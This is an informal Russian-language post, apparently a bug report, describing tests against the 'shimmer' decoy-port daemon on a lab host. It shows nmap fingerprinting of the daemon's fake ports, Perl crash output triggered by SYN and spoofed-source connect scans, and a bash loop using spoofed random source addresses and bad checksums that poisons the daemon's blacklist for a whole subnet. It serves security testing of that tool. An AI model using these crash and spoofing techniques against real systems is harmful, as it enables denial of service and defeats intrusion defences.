Нате демоны, жрите...
--------------------------
nmap -sSRV host -p 1025-65535 все порты светятся как tcpwrapped
PORT STATE SERVICE VERSION
50354/tcp open tcpwrapped
50744/tcp open tcpwrapped
50882/tcp open tcpwrapped
51102/tcp open tcpwrapped
51344/tcp open tcpwrapped
51445/tcp open tcpwrapped
А это уже первый признак, рандом расспределения какой-то х..нёй...
------------------
В даун при SYN атаке.
toshka:/test/shimmer # ./shimmerd --config=shimmer.conf
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
Use of uninitialized value in substitution (s///) at ./shimmerd line 626.
------------------
В даун при TCP connect() атаке. c фэйк адресом 0.0.0.0
toshka:/test/shimmer # ./shimmerd --config=shimmer.conf
Use of uninitialized value in subroutine entry at
/usr/lib/perl5/5.8.8/x86_64-linux-thread-multi/Socket.pm line 370.
Bad arg length for Socket::unpack_sockaddr_in, length is 0, should be 16 at
/usr/lib/perl5/5.8.8/x86_64-linux-thread-multi/Socket.pm line 370.
-----------------
При запуске из скрипта, который поднимает демон при падении...
не закрытые порты орут:
...
Thu Jan 10 04:41:59 2008: Failed to get handle for port 53374
Thu Jan 10 04:41:59 2008: Failed to get handle for port 58630
Thu Jan 10 04:41:59 2008: Failed to get handle for port 56368
Thu Jan 10 04:41:59 2008: Failed to get handle for port 53253
....
Кстати в конфиге указано ports = 50000-51000
--------------------------
После этой хрени, вся подсеть была BLACKLISTED :)
#!/bin/bash
for ((; ;))
do
RAND_1=`echo "$RANDOM % 255" | bc`
RAND_2=`echo "$RANDOM % 255" | bc`
SRC="192.168.$RAND_1.$RAND_2"
PORTS=$(nmap -n -sSRV 192.168.1.2 -p 1025-65354 | grep tcpwrapped | tr "/" " " | awk '{printf $1" "}')
for i in $PORTS
do
echo "SRC = $SRC, PORT = $i"
nmap -n -sT 192.168.1.2 -p $i -g 80 -S $SRC -e eth0 -P0 --data-length 0 --badsum
done
done
-----------
Сhao, я спать...